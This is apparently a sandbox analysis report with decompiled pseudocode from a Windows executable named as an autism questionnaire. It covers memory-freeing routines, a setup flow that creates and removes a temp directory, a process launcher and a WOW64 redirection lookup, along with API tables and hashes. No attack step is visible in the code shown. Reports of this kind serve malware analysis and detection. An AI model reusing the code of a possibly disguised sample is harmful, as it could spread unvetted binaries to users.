                                                                                              			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                                                              0x0040426c
                                                                                              0x0040426c
                                                                                              0x00404275
                                                                                              0x0040427b
                                                                                              0x00404364
                                                                                              0x00404367
                                                                                              0x00404454
                                                                                              0x00404455
                                                                                              0x00404458
                                                                                              0x00403cf8
                                                                                              0x00403cfa
                                                                                              0x00403cfc
                                                                                              0x00403d01
                                                                                              0x00403d04
                                                                                              0x00403d09
                                                                                              0x00403d0d
                                                                                              0x00403d13
                                                                                              0x00403d17
                                                                                              0x00403d1d
                                                                                              0x00403d39
                                                                                              0x00403d3d
                                                                                              0x00403d40
                                                                                              0x00403d40
                                                                                              0x00403d42
                                                                                              0x00403d4a
                                                                                              0x00403d57
                                                                                              0x00403d5c
                                                                                              0x00403d5e
                                                                                              0x00403d60
                                                                                              0x00403d63
                                                                                              0x00403d63
                                                                                              0x00403d65
                                                                                              0x00403d69
                                                                                              0x00403d6b
                                                                                              0x00403d6d
                                                                                              0x00403d6f
                                                                                              0x00000000
                                                                                              0x00403d6f
                                                                                              0x00000000
                                                                                              0x00403d6b
                                                                                              0x00403d1f
                                                                                              0x00403d27
                                                                                              0x00403d2e
                                                                                              0x00403d34
                                                                                              0x00403d30
                                                                                              0x00403d30
                                                                                              0x00403d30
                                                                                              0x00403d2e
                                                                                              0x00403d73
                                                                                              0x00403d75
                                                                                              0x00403d7e
                                                                                              0x00403d87
                                                                                              0x00403d87
                                                                                              0x00403d8a
                                                                                              0x00403d9a
                                                                                              0x0040445e
                                                                                              0x00404463
                                                                                              0x00404463
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404281
                                                                                              0x00404281
                                                                                              0x00404283
                                                                                              0x00404285
                                                                                              0x004042e8
                                                                                              0x004042e8
                                                                                              0x004042ed
                                                                                              0x004042f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042f3
                                                                                              0x004042f5
                                                                                              0x004042fc
                                                                                              0x00000000
                                                                                              0x004042fe
                                                                                              0x00404302
                                                                                              0x00404307
                                                                                              0x00404308
                                                                                              0x00404309
                                                                                              0x0040430e
                                                                                              0x00404312
                                                                                              0x0040431c
                                                                                              0x00404321
                                                                                              0x00404322
                                                                                              0x00000000
                                                                                              0x00404322
                                                                                              0x00404312
                                                                                              0x00000000
                                                                                              0x004042fc
                                                                                              0x004042e8
                                                                                              0x00404287
                                                                                              0x00404287
                                                                                              0x00404287
                                                                                              0x00404287
                                                                                              0x0040428b
                                                                                              0x0040428e
                                                                                              0x004042bc
                                                                                              0x004042be
                                                                                              0x004042d3
                                                                                              0x004042d3
                                                                                              0x004042c0
                                                                                              0x004042c0
                                                                                              0x004042c3
                                                                                              0x004042c6
                                                                                              0x004042c9
                                                                                              0x004042cc
                                                                                              0x004042ce
                                                                                              0x004042d1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042d1
                                                                                              0x004042d6
                                                                                              0x004042d8
                                                                                              0x004042da
                                                                                              0x004042dd
                                                                                              0x0040436d
                                                                                              0x00404370
                                                                                              0x00404372
                                                                                              0x00404374
                                                                                              0x00404375
                                                                                              0x00404377
                                                                                              0x00404328
                                                                                              0x00404328
                                                                                              0x0040432d
                                                                                              0x00404335
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404337
                                                                                              0x00404339
                                                                                              0x00404340
                                                                                              0x00000000
                                                                                              0x00404342
                                                                                              0x00404344
                                                                                              0x00404349
                                                                                              0x0040434e
                                                                                              0x00404356
                                                                                              0x0040435a
                                                                                              0x00000000
                                                                                              0x0040435a
                                                                                              0x00404356
                                                                                              0x00000000
                                                                                              0x00404340
                                                                                              0x00404328
                                                                                              0x00404379
                                                                                              0x00404379
                                                                                              0x00404381
                                                                                              0x00404385
                                                                                              0x004043bc
                                                                                              0x004043bf
                                                                                              0x004043c2
                                                                                              0x004043c4
                                                                                              0x004043ca
                                                                                              0x004043cc
                                                                                              0x004043cc
                                                                                              0x00404387
                                                                                              0x00404387
                                                                                              0x00404387
                                                                                              0x0040438a
                                                                                              0x0040438a
                                                                                              0x0040438e
                                                                                              0x00404392
                                                                                              0x004043d4
                                                                                              0x004043d7
                                                                                              0x004043d9
                                                                                              0x004043db
                                                                                              0x004043e1
                                                                                              0x004043e5
                                                                                              0x004043e5
                                                                                              0x004043e1
                                                                                              0x00404394
                                                                                              0x0040439a
                                                                                              0x004043ec
                                                                                              0x004043f6
                                                                                              0x00404424
                                                                                              0x0040442a
                                                                                              0x0040442f
                                                                                              0x00404436
                                                                                              0x00404440
                                                                                              0x00404446
                                                                                              0x0040444d
                                                                                              0x00404451
                                                                                              0x004043f8
                                                                                              0x004043f8
                                                                                              0x004043fb
                                                                                              0x004043fd
                                                                                              0x00404400
                                                                                              0x00404403
                                                                                              0x00404405
                                                                                              0x00404414
                                                                                              0x00404419
                                                                                              0x0040441c
                                                                                              0x00404420
                                                                                              0x00404420
                                                                                              0x0040439c
                                                                                              0x0040439f
                                                                                              0x004043a2
                                                                                              0x004043aa
                                                                                              0x004043af
                                                                                              0x004043b6
                                                                                              0x004043ba
                                                                                              0x004043ba
                                                                                              0x00404290
                                                                                              0x00404290
                                                                                              0x00404292
                                                                                              0x00404298
                                                                                              0x0040429b
                                                                                              0x004042a4
                                                                                              0x004042a7
                                                                                              0x004042aa
                                                                                              0x004042ad
                                                                                              0x004042b0
                                                                                              0x004042b3
                                                                                              0x004042b6
                                                                                              0x004042b6
                                                                                              0x004042b8
                                                                                              0x004042b9
                                                                                              0x0040429d
                                                                                              0x0040429d
                                                                                              0x0040429d
                                                                                              0x0040429f
                                                                                              0x004042a1
                                                                                              0x004042a2
                                                                                              0x004042a2
                                                                                              0x0040429b
                                                                                              0x0040428e

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                              • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                                              • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                              • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 75%
                                                                                              			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d582c
					_t15 = _t37 + 0x14; // 0x61f9f4f
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d582c
					_t16 = _t44 + 0x18; // 0x302c00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d582c
					_t17 = _t47 + 0x18; // 0x302c00
					_t86 =  *0x4c1de0; // 0x7fb50010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d582c
					_t18 = _t55 + 0x18; // 0x302c00
					_t56 =  *0x4c1de4; // 0x2230f00
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x2230f00
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0x1d025e
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x1
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                                                              0x004b60e8
                                                                                              0x004b60e8
                                                                                              0x004b60e8
                                                                                              0x004b60ea
                                                                                              0x004b60ec
                                                                                              0x004b60ed
                                                                                              0x004b610d
                                                                                              0x004b6119
                                                                                              0x004b613e
                                                                                              0x004b614b
                                                                                              0x004b6150
                                                                                              0x004b6156
                                                                                              0x004b615c
                                                                                              0x004b615f
                                                                                              0x004b6169
                                                                                              0x004b6181
                                                                                              0x004b6183
                                                                                              0x004b618d
                                                                                              0x004b618d
                                                                                              0x004b6181
                                                                                              0x004b6192
                                                                                              0x004b619a
                                                                                              0x004b61a7
                                                                                              0x004b61af
                                                                                              0x004b61b4
                                                                                              0x004b61c4
                                                                                              0x004b61cc
                                                                                              0x004b61d0
                                                                                              0x004b61d5
                                                                                              0x004b61e2
                                                                                              0x004b61e3
                                                                                              0x004b61ed
                                                                                              0x004b61f3
                                                                                              0x004b61f8
                                                                                              0x004b61fd
                                                                                              0x004b6200
                                                                                              0x004b6205
                                                                                              0x004b620c
                                                                                              0x004b620d
                                                                                              0x004b6212
                                                                                              0x004b6215
                                                                                              0x004b621a
                                                                                              0x004b6232
                                                                                              0x004b6237
                                                                                              0x004b623e
                                                                                              0x004b623f
                                                                                              0x004b6244
                                                                                              0x004b6247
                                                                                              0x004b624a
                                                                                              0x004b624f
                                                                                              0x004b6257
                                                                                              0x004b625c
                                                                                              0x004b6261
                                                                                              0x004b6264
                                                                                              0x004b626e
                                                                                              0x004b6275
                                                                                              0x004b6276
                                                                                              0x004b627b
                                                                                              0x004b627e
                                                                                              0x004b6281
                                                                                              0x004b6287
                                                                                              0x004b6294
                                                                                              0x004b6299
                                                                                              0x004b62a0
                                                                                              0x004b62a1
                                                                                              0x004b62a6
                                                                                              0x004b62a9
                                                                                              0x004b62ac
                                                                                              0x004b62b1
                                                                                              0x004b62b6
                                                                                              0x004b62bb
                                                                                              0x004b62c2
                                                                                              0x004b62c5
                                                                                              0x004b62c8
                                                                                              0x004b62cd
                                                                                              0x004b62d7
                                                                                              0x004b611b
                                                                                              0x004b611b
                                                                                              0x004b6120
                                                                                              0x004b6126
                                                                                              0x004b612d
                                                                                              0x004b64b5
                                                                                              0x004b64b8
                                                                                              0x004b64bb
                                                                                              0x004b64c0
                                                                                              0x004b64c5
                                                                                              0x004b64d1
                                                                                              0x004b64df
                                                                                              0x004b64e7
                                                                                              0x004b64e7
                                                                                              0x004b64f3
                                                                                              0x004b64f5
                                                                                              0x004b6500
                                                                                              0x004b6500
                                                                                              0x004b650c
                                                                                              0x004b650e
                                                                                              0x004b6514
                                                                                              0x004b6514
                                                                                              0x004b6520
                                                                                              0x004b6522
                                                                                              0x004b6527
                                                                                              0x004b652d
                                                                                              0x004b6533
                                                                                              0x004b6538
                                                                                              0x004b653d
                                                                                              0x004b6544
                                                                                              0x00000000
                                                                                              0x004b6544
                                                                                              0x004b6549
                                                                                              0x004b6549

                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                                                • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                              • DestroyWindow.USER32(001D025E,004B6554), ref: 004B6514
                                                                                                • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                                • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                                • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                                              • String ID: ,XM$.tmp$0MB
                                                                                              • API String ID: 3858953238-2140637138
                                                                                              • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                              • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                                              • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                              • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AF728, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 61%
                                                                                              			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                                                              0x004af733
                                                                                              0x004af736
                                                                                              0x004af738
                                                                                              0x004af73a
                                                                                              0x004af73e
                                                                                              0x004af73f
                                                                                              0x004af744
                                                                                              0x004af747
                                                                                              0x004af74a
                                                                                              0x004af74f
                                                                                              0x004af750
                                                                                              0x004af755
                                                                                              0x004af75e
                                                                                              0x004af76d
                                                                                              0x004af772
                                                                                              0x004af798
                                                                                              0x004af79d
                                                                                              0x004af79f
                                                                                              0x004af7a5
                                                                                              0x004af7a5
                                                                                              0x004af7ae
                                                                                              0x004af7b3
                                                                                              0x004af7b3
                                                                                              0x004af7cc
                                                                                              0x004af7d1
                                                                                              0x004af7db
                                                                                              0x004af7e4
                                                                                              0x004af7eb
                                                                                              0x004af7ee
                                                                                              0x004af7f1
                                                                                              0x004af7fe

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32 ref: 004AF798
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                              • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                                • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                              • String ID: D
                                                                                              • API String ID: 3356880605-2746444292
                                                                                              • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                              • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                                                              • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                                                              • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004B5A90, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 60%
                                                                                              			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x4b5b5a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x4c1124 =  *0x4c1124 - 1;
				if( *0x4c1124 < 0) {
					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
